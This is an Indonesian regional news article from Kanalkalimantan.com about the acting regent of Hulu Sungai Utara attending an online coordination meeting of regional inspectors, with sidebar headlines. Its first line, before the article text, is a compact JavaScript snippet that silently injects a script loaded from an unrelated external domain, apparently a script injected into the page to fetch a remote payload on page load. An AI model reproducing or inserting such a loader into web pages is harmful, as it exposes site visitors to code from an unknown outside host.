(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Pj Bupati HSU Ikuti Rakor Inspektur Daerah Seluruh Indonesia


KANALKALIMANTAN.COM, AMUNTAI – Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Raden Suria Fadliansyah bersama unsur Forkopimda ikuti Rapat Koordinasi (Rakor) Inspektur Daerah se Indonesia secara daring dari Mess Negara Dipa Amuntai, Rabu (25/1/2023).

Rakor ini dibuka Menteri Dalam Negeri RI Tito Karnavian dengan diawali penandatanganan kerjasama antara Kementerian Dalam Negeri, Kejaksaan Agung, dan Kepolisian Negara Republik Indonesia tentang koordinasi Aparat Pengawasan Internal Pemerintah (APIP) dengan Aparat Penegak Hukum (APH) sehubungan penanganan laporan atau pengaduan dalam penyelenggaraan pemerintahan daerah.

Mendagri Tito Karnavian meminta agar pertumbuhan ekonomi harus tetap dijaga untuk mencapai itu saat ini modal APBN dan APBD yang memancing sektor swasta.

“Belanja APBN dan APBD ini harus efektif dan efisien dimanfaatkan sebaik mungkin. Untuk bisa efektif dan efisien harus betul-betul dijaga agar tidak bocor dan tepat sasaran sesuai kebutuhan masing-masing,” katanya.

 

Baca juga: Pria Ditemukan Tertelungkup Tak Bernyawa di Pinggir Jalan Kampung Melayu Darat

Tito menyebut APH dan APIP berperan untuk menegakkan aturan administrasi dan pidana agar program tepat sasaran, efektif dan efisien mendorong pertumbuhan ekonomi.

“Karenanya kesepakatan yang dibangun ini merupakan upaya terciptanya sinergisitas yang lebih baik antara APIP dan APH dalam pelaksanaan setiap poin-poin dalam MoU yang baru saja ditanda tangani,” imbuhnya.

Setelah mengikuti Rakor, Pj Bupati HSU Raden Suria mengatakan, rapat koordinasi ini merupakan sebuah upaya yang dilakukan oleh pemerintah pusat untuk lebih meningkatkan pengawasan daerah dan kerjasama antara APIP dan APH.

Menurutnya mengefektifkan pengawasan di daerah yang pada akhirnya tertuju pada kemajuan pembangunan dan kesejahteraan masyarakat khususnya di Kabupaten Hulu Sungai Utara.

Baca juga: Tabrakan Maut di Jalan Trikora, Pengendara Roda Dua Tewas di Tempat

“Harapan kerjasama ini dapat mencegah terjadinya penyimpangan-penyimpangan di daerah,” pungkasnya. (Kanalkalimantan.com/dew)

Reporter : dew 
Editor : bie


Risa

Recent Posts

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

39 menit ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

2 jam ago

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

3 jam ago

780 Anggota PPK se Kalsel Dilantik, Bertugas 8 Bulan

KANALKALIMANTAN.COM, BANJARBARU - Seluruh Panitia Pemilihan Kecamatan (PPK) di Provinsi Kalimantan Selatan (Kalsel) resmi dilantik… Read More

4 jam ago

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

7 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

18 jam ago

This website uses cookies.